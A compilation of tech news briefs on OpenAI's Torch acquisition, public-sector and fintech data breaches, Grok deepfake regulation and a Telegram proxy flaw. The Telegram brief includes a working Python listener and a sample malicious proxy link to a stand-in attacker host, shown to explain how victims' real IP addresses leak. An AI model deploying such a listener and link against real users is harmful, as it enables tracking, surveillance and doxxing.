OpenAI expands healthcare strategy with Torch acquisition

US AI company OpenAI has acquired healthcare technology startup Torch only days after unveiling ChatGPT Health, signalling an accelerated push into medical and clinical applications.

Financial terms were not officially disclosed, although media reports estimate the transaction at between $60 million and $100 million.

Torch was developed as a unified medical memory platform, designed to consolidate patient data from hospitals, laboratories, wearable devices and consumer testing services.

The company positioned its technology as a means to support AI systems in navigating fragmented healthcare information, rather than relying on isolated data sources.
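As a rough illustration of what that consolidation involves, the sketch below models a unified patient record that folds observations from several sources into a single chronological history. All names, fields and source labels are hypothetical assumptions for illustration only; Torch's actual schema has not been published.

```python
from dataclasses import dataclass, field
from datetime import datetime

@dataclass
class Observation:
    """One data point from one source; fields are illustrative assumptions."""
    source: str           # e.g. "hospital_ehr", "lab", "wearable", "consumer_test"
    kind: str             # e.g. "blood_pressure", "hba1c", "resting_heart_rate"
    value: str
    recorded_at: datetime

@dataclass
class PatientRecord:
    """Hypothetical unified record: one timeline instead of isolated silos."""
    patient_id: str
    observations: list[Observation] = field(default_factory=list)

    def merge(self, incoming: list[Observation]) -> None:
        # Fold another source's data in and keep the history chronological,
        # so a downstream AI system reads one coherent record rather than
        # reconciling fragmented data sources at query time.
        self.observations.extend(incoming)
        self.observations.sort(key=lambda o: o.recorded_at)
```

The merge step is the point of such a design: once every source lands in one ordered timeline, an AI system no longer has to navigate isolated silos itself.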

Torch’s four-person team will join OpenAI following the acquisition, reinforcing the company’s internal healthcare expertise. OpenAI has emphasised privacy, safety and collaboration with medical professionals as core principles guiding its expansion into sensitive data environments.

The acquisition fits into a broader OpenAI strategy of strengthening enterprise offerings, particularly for large healthcare organisations. Recent hires and partnerships suggest healthcare remains a priority area as AI adoption increases across regulated sectors.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Government IT vulnerabilities revealed by UK public sector cyberattack

A UK public sector cyberattack on Kensington and Chelsea Council has exposed the growing vulnerability of government organisations to data breaches. The council stated that personal details linked to hundreds of thousands of residents may have been compromised after attackers targeted IT infrastructure the council shares with partner organisations.

Security experts warn that interconnected systems, while cost-efficient, create systemic risks. Dray Agha, senior manager of security operations at Huntress, said a single breach can quickly spread across partner organisations, disrupting essential services and exposing sensitive information.

Public sector bodies remain attractive targets due to ageing infrastructure and the volume of personal data they hold. Records such as names, addresses, national ID numbers, health information, and login credentials can be exploited for fraud, identity theft, and large-scale scams.

Gregg Hardie, public sector regional vice president at SailPoint, noted that attackers often employ simple, high-volume tactics rather than sophisticated techniques. Compromised credentials allow criminals to blend into regular activity and remain undetected for long periods before launching disruptive attacks.

Hardie said stronger identity security and continuous monitoring are essential to prevent minor intrusions from escalating. Investing in resilient, segmented systems could help reduce the impact of future attacks on the UK public sector and protect critical operations.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

One-click vulnerability in Telegram bypasses VPN and proxy protection

A newly identified vulnerability in Telegram’s mobile apps allows attackers to reveal users’ real IP addresses with a single click. The flaw, known as a ‘one-click IP leak’, can expose location and network details even when VPNs or proxies are enabled.

The issue stems from Telegram’s automatic proxy-testing process. When a user clicks a disguised proxy link, the app initiates a direct connection request that bypasses all privacy protections and reveals the device’s real IP address.

Cybersecurity researcher @0x6rss demonstrated the flaw in a post on X, showing that a single click is enough to log a victim’s real IP address. The request behaves similarly to known Windows NTLM leaks, in which background authentication attempts expose identifying information without explicit user consent.

Attackers can embed malicious proxy links in chats or channels, masking them as standard usernames. Once clicked, Telegram silently runs the proxy test, bypasses VPN or SOCKS5 protections, and sends the device’s real IP address to the attacker’s server, enabling tracking, surveillance, or doxxing.
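The attacker-side half of this attack requires almost no infrastructure, which is part of what makes it dangerous. The sketch below is a hypothetical illustration, not the researcher’s actual proof of concept: a bare TCP listener that logs the source address of anything that connects, which is all an attacker-controlled ‘proxy’ endpoint needs to do. The host, port and example link in the comments are made up.

```python
import socket
from datetime import datetime, timezone

# Hypothetical attacker-side listener for a one-click IP leak. A malicious
# proxy deep link (for example tg://proxy?server=attacker.example&port=8443&...)
# would point here; if the app auto-tests the proxy when the link is clicked,
# the TCP handshake alone discloses the victim's real IP address.

HOST, PORT = "0.0.0.0", 8443  # assumed values for this sketch

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((HOST, PORT))
    srv.listen()
    while True:
        conn, (ip, src_port) = srv.accept()
        # The connection itself is the payload: record the source IP, then drop it.
        print(f"{datetime.now(timezone.utc).isoformat()} hit from {ip}:{src_port}")
        conn.close()
```

Because the leak occurs at the TCP layer, the listener never needs to speak Telegram’s protocol at all; effective defences therefore have to stop the connection from being attempted in the first place, which is what the recommendations below aim at.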

Both Android and iOS versions are affected, putting millions of privacy-focused users at risk. Researchers recommend avoiding unknown links, turning off automatic proxy detection where possible, and using firewall tools to block outbound proxy tests. Telegram has not publicly confirmed a fix.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Betterment confirms data breach after social engineering attack

Fintech investment platform Betterment has confirmed a data breach after hackers gained unauthorised access to parts of its internal systems and exposed personal customer information.

The incident occurred on 9 January and involved a social engineering attack connected to third-party platforms used for marketing and operational purposes.

The company said the compromised data included customer names, email and postal addresses, phone numbers and dates of birth.

No passwords or account login credentials were accessed, according to Betterment, which stressed that customer investment accounts were not breached.

Using that limited system access, the attackers sent some users fraudulent notifications promoting a crypto-related scam.

Customers were advised to ignore the messages rather than engage with them, while Betterment moved quickly to revoke the unauthorised access and begin a formal investigation with external cybersecurity support.

Betterment has not disclosed how many users were affected and has yet to provide further technical details. Representatives did not respond to requests for comment at the time of publication, while the company said outreach to impacted customers remains ongoing.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Australia raises concerns over AI misuse on X

The eSafety regulator in Australia has expressed concern over the misuse of the generative AI system Grok on social media platform X, following reports involving sexualised or exploitative content, particularly affecting children.

Although overall report numbers remain low, authorities in Australia have observed an increase in recent weeks.

The regulator confirmed that enforcement powers under the Online Safety Act remain available where content meets defined legal thresholds.

X and other services are subject to systemic obligations requiring the detection and removal of child sexual exploitation material, alongside broader industry codes and safety standards.

eSafety has formally requested further information from X regarding safeguards designed to prevent misuse of generative AI features and to ensure compliance with existing obligations.

Previous enforcement actions taken in 2025 against similar AI services resulted in their withdrawal from the Australian market.

Additional mandatory safety codes will take effect in March 2026, introducing new obligations for AI services to limit children’s exposure to sexually explicit, violent and self-harm-related material.

Authorities emphasised the importance of Safety by Design measures and continued international cooperation among online safety regulators.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Teen victim turns deepfake experience into education

A US teenager targeted by explicit deepfake images has helped create a new training course. The programme aims to support students, parents and school staff facing online abuse.

The course explains how AI tools are used to create sexualised fake images. It also outlines legal rights, reporting steps and available victim support resources.

Research shows deepfake abuse is spreading among teenagers despite stronger laws. One in eight US teens knows someone targeted by non-consensual fake images.

Developers say education remains critical as AI tools become easier to access. Schools are encouraged to adopt training to protect students and prevent harm.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Patients notified months after Canopy Healthcare cyber incident

Canopy Healthcare, one of New Zealand’s largest private medical oncology providers, has disclosed a data breach affecting patient and staff information, six months after the incident occurred.

The company said an unauthorised party accessed part of its administration systems on 18 July 2025, copying a ‘small’ amount of data. Affected information may include patient records, passport details, and some bank account numbers.

Canopy said it remains unclear exactly which individuals were impacted and what data was taken, adding that no evidence has emerged of the information being shared or published online.

Patients began receiving notifications in December 2025, prompting criticism over the delay. One affected patient said they were unhappy to learn about the breach months after it happened.

The New Zealand company said it notified police and the Privacy Commissioner at the time, secured a High Court injunction to prevent misuse of the data, and confirmed that its medical services continue to operate normally.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Cyber Fortress strengthens European cyber resilience

Luxembourg has hosted its largest national cyber defence exercise, Cyber Fortress, bringing together military and civilian specialists to practise responding to real-time cyberattacks on digital systems.

Since its launch in 2021, Cyber Fortress has evolved beyond a purely technical drill. The exercise now includes a realistic fictional scenario supported by simulated media injects, creating a more immersive and practical training environment for participants.

This year’s edition expanded its international reach, with teams joining from Belgium, Latvia, Malta and the EU Cyber Rapid Response Teams. Around 100 participants also took part from a parallel site in Latvia, working alongside Luxembourg-based teams.

The exercise focuses on interoperability during cyber crises. Participants respond to multiple simulated attacks while protecting critical services, including systems linked to drone operations and other sensitive infrastructure.

Cyber Fortress now covers technical, procedural and management aspects of cyber defence. A new emphasis on disinformation, deepfakes and fake news reflects the growing importance of information warfare.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

UK considers regulatory action after Grok’s deepfake images on X

UK Prime Minister Keir Starmer is consulting Canada and Australia on a coordinated response to concerns surrounding social media platform X, after its AI assistant Grok was used to generate sexualised deepfake images of women and children.

The discussions focus on shared regulatory approaches rather than immediate bans.

X acknowledged weaknesses in its AI safeguards and limited image generation to paying users. Lawmakers in several countries have stated that further regulatory scrutiny may be required, while Canada has clarified that no prohibition is currently under consideration, despite concerns over platform responsibility.

In the UK, media regulator Ofcom is examining potential breaches of online safety obligations. Technology Secretary Liz Kendall confirmed that enforcement mechanisms remain available if legal requirements are not met.

Australian Prime Minister Anthony Albanese also raised broader concerns about social responsibility in the use of generative AI.

X owner Elon Musk rejected accusations of non-compliance, describing potential restrictions as censorship and suppression of free speech.

European authorities have requested the preservation of internal records for possible investigations, while Indonesia and Malaysia have already blocked access to Grok.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Indonesia and Malaysia restrict access to Grok AI over content safeguards

Malaysia and Indonesia have restricted access to Grok, the AI chatbot available through the X platform, following concerns about its image generation capabilities.

Authorities said the tool had been used to create manipulated images depicting real individuals in sexually explicit contexts.

Regulatory bodies in Malaysia and Indonesia stated that the decision was based on the absence of sufficient safeguards to prevent misuse.

Requests for additional risk mitigation measures were communicated to the platform operator, with access expected to remain limited until further protections are introduced.

The move has drawn attention from regulators in other regions, where online safety frameworks allow intervention when digital services fail to address harmful content. Discussions have focused on platform responsibility, content moderation standards, and compliance with existing legal obligations.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!